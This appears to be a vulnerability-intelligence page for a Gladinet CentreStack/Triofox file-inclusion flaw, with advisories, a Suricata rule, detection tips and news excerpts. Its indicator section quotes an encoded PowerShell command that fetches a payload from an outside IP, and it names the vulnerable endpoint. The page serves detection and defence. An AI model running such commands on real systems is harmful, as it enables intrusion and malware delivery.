CVE-2025-11371
published 2025-10-09CVE-2025-11371: In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended…
PriorityP191high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2025-11-25
Exploited in the wild
EPSS
92.09%
99.8th percentile
In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild.
This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gladinet | centrestack | < 16.10.10408.56683 | 16.10.10408.56683 |
| gladinet | centrestack_and_triofox | <= 16.7.10368.56560 | — |
| gladinet | triofox | <= 16.7.10368.56560 | — |
Detection & IOCsextracted from sources · hover to see the quote
command"C:\Windows\System32\cmd.exe" /c powershell -e SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAOQA2AC4AMQAxAC4AMgAwADcAOgA4ADAAMAAwAC8AYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQA=↗
- →Monitor IIS/w3wp.exe for child process execution of cmd.exe or PowerShell, which indicates post-exploitation via ViewState deserialization following LFI of web.config ↗
- →Alert on Windows Application Event ID 1316 which captures ViewState deserialization attack payloads in the application event log ↗
- →Detect HTTP referrer from FOFA (https://en.fofa.info/) in web server logs preceding exploitation requests against Gladinet endpoints ↗
- →Monitor for creation or access of C:\programdata\CentreStac_log.txt, used by attackers to exfiltrate command output via the LFI endpoint ↗
- →Alert on creation or execution of conqueror.exe in C:\Users\Public\ as a dropped payload indicator ↗
- →Detect requests to /storage/filesvr.dn with a 't' parameter containing a timestamp set to year 9999, indicating a crafted never-expiring access ticket exploiting the hardcoded AES key vulnerability ↗
- ·The LFI vulnerability (CVE-2025-11371) is exploitable only when the TempDownload handler (t.dn) is enabled in the UploadDownloadProxy Web.config. Disabling this handler mitigates the vulnerability until patching. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vulncheck7.5HIGH
cisa7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-hj6h-fpv2-5h4v: In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows u
ghsa_unreviewed·2025-10-09
CVE-2025-11371 [MEDIUM] CWE-220 GHSA-hj6h-fpv2-5h4v: In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows u
In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild.
This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560
VulnCheck
Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability
vulncheck·2025·CVSS 7.5
CVE-2025-11371 [HIGH] CWE-552 Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability
Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability
Gladinet CentreStack and Triofox contains a files or directories accessible to external parties vulnerability that allows unintended disclosure of system files.
Affected: Gladinet CentreStack and Triofox
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw; https://horizon3.ai/attack-research/vulnerabilities/cve-2025-11371/; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-11371&date=2025-10-31; https://api.vulncheck.com/v3/index/vulnc
CISA
Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability
cisa·2025-11-04·CVSS 7.5
CVE-2025-11371 [HIGH] CWE-552 Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability
Vulnerability: Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability
Affected: Gladinet CentreStack and Triofox
Gladinet CentreStack and Triofox contains a files or directories accessible to external parties vulnerability that allows unintended disclosure of system files.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://www.centrestack.com/p/gce_latest_release.html ; https://nvd.nist.gov/vuln/detail/CVE-2025-11371
Remediation Due Date: 2025-11-25
Suricata
ET WEB_SPECIFIC_APPS Gladinet CentreStack and Triofox Local File Inclusion (CVE-2025-11371)
suricata·2025-10-20·CVSS 7.5
CVE-2025-11371 [HIGH] ET WEB_SPECIFIC_APPS Gladinet CentreStack and Triofox Local File Inclusion (CVE-2025-11371)
ET WEB_SPECIFIC_APPS Gladinet CentreStack and Triofox Local File Inclusion (CVE-2025-11371)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Gladinet CentreStack and Triofox Local File Inclusion (CVE-2025-11371)"; flow:established,to_server; http.uri; content:"|2f|storage|2f|t|2e|dn|3f|"; startswith; fast_pattern; content:"s|3d|"; pcre:"/^[^\x26]*?(?:(?:\x2e|%2[Ee]){1,2}(?:\x2f|\x5c|%5[Cc]|%2[Ff]){1,}){2,}/R"; http.method; content:"GET"; reference:cve,2025-11371; classtype:web-application-attack; sid:2065258; rev:1; metadata:affected_product Gladinet_Triofox, affected_product Gladinet_CentreStack, attack_target Server, tls_state TLSDecrypt, created_at 2025_10_20, cve CVE_2025_11371, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, t
Metasploit
Gladinet CentreStack/Triofox Path Traversal
metasploit·CVSS 7.5
CVE-2025-11371 [HIGH] Gladinet CentreStack/Triofox Path Traversal
Gladinet CentreStack/Triofox Path Traversal
This module exploits a path traversal vulnerability (CVE-2025-11371) in Gladinet CentreStack and Triofox that allows an unauthenticated attacker to read arbitrary files from the server's file system. The vulnerability exists in the `/storage/t.dn` endpoint which does not properly sanitize the `s` parameter, allowing path traversal attacks. This can be used to read sensitive files such as Web.config which contains the machineKey used for ViewState deserialization attacks (CVE-2025-30406). Gladinet CentreStack versions up to 16.10.10408.56683 are vulnerable. Gladinet Triofox versions up to 16.10.10408.56683 are vulnerable.
Nuclei
Gladinet CentreStack & TrioFox - Local File Inclusion
nuclei·CVSS 7.5
CVE-2025-11371 [HIGH] Gladinet CentreStack & TrioFox - Local File Inclusion
Gladinet CentreStack & TrioFox - Local File Inclusion
In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild. This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560
Template:
id: CVE-2025-11371
info:
name: Gladinet CentreStack & TrioFox - Local File Inclusion
author: Kazgangap
severity: medium
description: |
In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been obser
Huntress
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability
blogs_huntress·2025-12-18
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability
Acknowledgments: Special thanks to John Hammond for his contributions to this investigation and writ e-up.
Update #2: 12/18/25 @ 6pm ET
We’ve seen reports from other intelligence firms that note that the cl0p ransomware group is targeting internet-facing Gladinet CentreStack servers. It is still early and we can’t fully confirm if this behavior definitively stems from cl0p. However, we continue to monitor for potential Gladinet exploitation. Most recently, we observed two new incidents on December 15.
Based on the available telemetry, both of these incidents involved suspected Gladinet CentreStack exploitation.
As seen in Figure 1 below, both incidents involved the same indicators involving a PowerShell command, which was executed via w3wp.exe :
"C:\Windows\System32\cmd.exe" /c powers
Bleepingcomputer
Hackers abuse Triofox antivirus feature to deploy remote access tools
blogs_bleepingcomputer·2025-11-11·CVSS 9.1
CVE-2025-12480 [CRITICAL] Hackers abuse Triofox antivirus feature to deploy remote access tools
## Hackers abuse Triofox antivirus feature to deploy remote access tools
## Bill Toulas
Hackers exploited a critical vulnerability and the built-in antivirus feature in Gladinet's Triofox file-sharing and remote-access platform to achieve remote code execution with SYSTEM privileges.
The security issue leveraged in the attack is CVE-2025-12480 and can be used to bypass authentication and obtain access to the application's setup pages.
Security researchers at Google Threat Intelligence Group (GTIG) discovered the malicious activity on August 24, after a threat cluster tracked internally as UNC6485 targeted a Triofox server running version 16.4.10317.56372, released on April 3.
The root cause for CVE-2025-12480 is an access control logic gap where admin access is granted when the applic
Bleepingcomputer
CISA warns of critical CentOS Web Panel bug exploited in attacks
blogs_bleepingcomputer·2025-11-05·CVSS 7.5
[HIGH] CISA warns of critical CentOS Web Panel bug exploited in attacks
## CISA warns of critical CentOS Web Panel bug exploited in attacks
## Bill Toulas
CWP is a free web hosting control panel used for Linux server management, marketed as an open-source alternative to commercial panels like cPanel and Plesk. It is widely used by web hosting providers, system administrators, and VPS or dedicated server operators.
The issue impacts all CWP versions before 0.9.8.1204 and was demonstrated on CentOS 7 in late June by Fenrisk security researcher Maxime Rinaudo.
In a detailed technical write-up , the researcher explains that the root cause of the flaw is the file-manager ‘ changePerm ’ endpoint processing requests even when the per-user identifier is omitted, allowing unauthenticated requests to reach code that expects a logged-in user.
Furthermore, the ‘ t_to
Bleepingcomputer
Gladinet fixes actively exploited zero-day in file-sharing software
blogs_bleepingcomputer·2025-10-16·CVSS 7.5
CVE-2025-11371 [HIGH] Gladinet fixes actively exploited zero-day in file-sharing software
## Gladinet fixes actively exploited zero-day in file-sharing software
## Bill Toulas
Gladinet has released security updates for its CentreStack business solution to address a local file inclusion vulnerability (CVE-2025-11371) that threat actors have leveraged as a zero-day since late September.
Researchers at cybersecurity platform Huntress disclosed the exploitation activity last week saying that the flaw was a bypass for mitigations Gladinet implemented for the deserialization vulnerability leading to remote code execution (RCE) identified as CVE-2025-30406.
The local file inclusion (LFI) vulnerability enabled attackers to read the Web.config file on fully patched CentreStack deployments, extract the machine key, and then use it to exploit CVE-2025-30406.
When Huntress alerted of
Huntress
Active Exploitation of Gladinet CentreStack and Triofox Local File Inclusion Flaw
blogs_huntress·2025-10-15·CVSS 7.5
[HIGH] Active Exploitation of Gladinet CentreStack and Triofox Local File Inclusion Flaw
Update #1: 10/15/25 @ 1pm ET
On October 14, Gladinet released version 16.10.10408.56683 of CentreStack, which includes a fix for the local file inclusion vulnerability outlined below. Huntress recommends that impacted organizations update to the latest build number as soon as possible.
As a patch has now been issued, we are also releasing further analysis of the vulnerability and exploitation activity, as detailed below. The below also includes parts of the original blog, published 10/9/25.
TL;DR: Huntress has discovered in-the-wild exploitation of an unauthenticated Local File Inclusion flaw ( CVE-2025-11371 ) in Gladinet CentreStack and Triofox products. As of the initial writing of this blog, a patch was not available in the latest versions of CentreStack and Triofox.
## Background
Bleepingcomputer
Hackers exploiting zero-day in Gladinet file sharing software
blogs_bleepingcomputer·2025-10-10·CVSS 7.5
CVE-2025-11371 [HIGH] Hackers exploiting zero-day in Gladinet file sharing software
## Hackers exploiting zero-day in Gladinet file sharing software
## Bill Toulas
Threat actors are exploiting a zero-day vulnerability (CVE-2025-11371) in Gladinet CentreStack and Triofox products, which allows a local attacker to access system files without authentication.
At least three companies have been targeted so far. Although a patch is not yet available, customers can apply mitigations.
CentreStack and Triofox are Gladinet's business solutions for file sharing and remote access that allow using a company's own storage as a cloud. According to the vendor, CentreStack "is used by thousands of businesses from over 49 countries."
## No fix, all versions affected
The zero-day vulnerability CVE-2025-11371 is a Local File Inclusion (LFI) flaw affecting the default installation and c
Greynoiseio
NoiseLetter October 2025
blogs_greynoiseio
NoiseLetter October 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Huntress
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability | Huntress
blogs_huntress
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability | Huntress
Acknowledgments: Special thanks to John Hammond for his contributions to this investigation and write-up.
Update #2: 12/18/25 @ 6pm ET
We’ve seen reports from other intelligence firms that note that the cl0p ransomware group is targeting internet-facing Gladinet CentreStack servers. It is still early and we can’t fully confirm if this behavior definitively stems from cl0p. However, we continue to monitor for potential Gladinet exploitation. Most recently, we observed two new incidents on December 15.
Based on the available telemetry, both of these incidents involved suspected Gladinet CentreStack exploitation.
As seen in Figure 1 below, both incidents involved the same indicators involving a PowerShell command, which was executed via w3wp.exe:
"C:\Windows\System32\cmd.exe" /c powershe
Wiz
CVE-2025-14611 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2025-14611 [HIGH] CVE-2025-14611 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14611 :
Gladinet CentreStack vulnerability analysis and mitigation
Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise.
Source : NVD
## 7.1
Score
Published December 12, 2025
Severity HIGH
CNA Score 7.1
Affected Technologies
Gladinet CentreStack
Has Public Exploit Yes
Has CISA KEV Exploit Yes
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Pe
Huntress
Active Exploitation of Gladinet CentreStack and Triofox Local File Inclusion Flaw | Huntress
blogs_huntress·CVSS 7.5
[HIGH] Active Exploitation of Gladinet CentreStack and Triofox Local File Inclusion Flaw | Huntress
Update #1: 10/15/25 @ 1pm ET
On October 14, Gladinet released version 16.10.10408.56683 of CentreStack, which includes a fix for the local file inclusion vulnerability outlined below. Huntress recommends that impacted organizations update to the latest build number as soon as possible.
As a patch has now been issued, we are also releasing further analysis of the vulnerability and exploitation activity, as detailed below. The below also includes parts of the original blog, published 10/9/25.
TL;DR: Huntress has discovered in-the-wild exploitation of an unauthenticated Local File Inclusion flaw (CVE-2025-11371) in Gladinet CentreStack and Triofox products. As of the initial writing of this blog, a patch was not available in the latest versions of CentreStack and Triofox.
## Background
Recorded Future
October 2025 CVE Landscape
blogs_recorded_future·CVSS 9.8
[CRITICAL] October 2025 CVE Landscape
# October 2025 CVE Landscape: 32 High-Impact Vulnerabilities Demand Immediate Attention
October 2025 saw a significant escalation in vulnerability activity, with Recorded Future's Insikt Group® identifying 32 high-impact vulnerabilities, double the 16 identified in September's CVE report. Twenty-six of these vulnerabilities scored as Very Critical.
What security teams need to know:
- Microsoft dominates: Eight of 32 vulnerabilities affect Microsoft products, including a critical WSUS deserialization flaw (CVE-2025-59287) now being actively exploited
- CL0P ransomware group exploited an Oracle E-Business Suite zero-day (CVE-2025-61882) for data theft and extortion campaigns
- Legacy vulnerabilities persist: Five of the 14 RCE-enabling vulnerabilities are over a decade old, highlighting c
Recorded Future
October 2025 CVE Landscape
blogs_recorded_future·CVSS 9.8
[CRITICAL] October 2025 CVE Landscape
## October 2025 CVE Landscape: 32 High-Impact Vulnerabilities Demand Immediate Attention
October 2025 saw a significant escalation in vulnerability activity, with Recorded Future's Insikt Group® identifying 32 high-impact vulnerabilities , double the 16 identified in September's CVE report . Twenty-six of these vulnerabilities scored as Very Critical.
What security teams need to know:
Microsoft dominates: Eight of 32 vulnerabilities affect Microsoft products, including a critical WSUS deserialization flaw ( CVE-2025-59287 ) now being actively exploited
CL0P ransomware group exploited an Oracle E-Business Suite zero-day ( CVE-2025-61882 ) for data theft and extortion campaigns
Legacy vulnerabilities persist: Five of the 14 RCE-enabling vulnerabilities are over a decade old, highlightin
2025-10-09
Published
2025-11-04
Added to CISA KEV
Exploited in the wild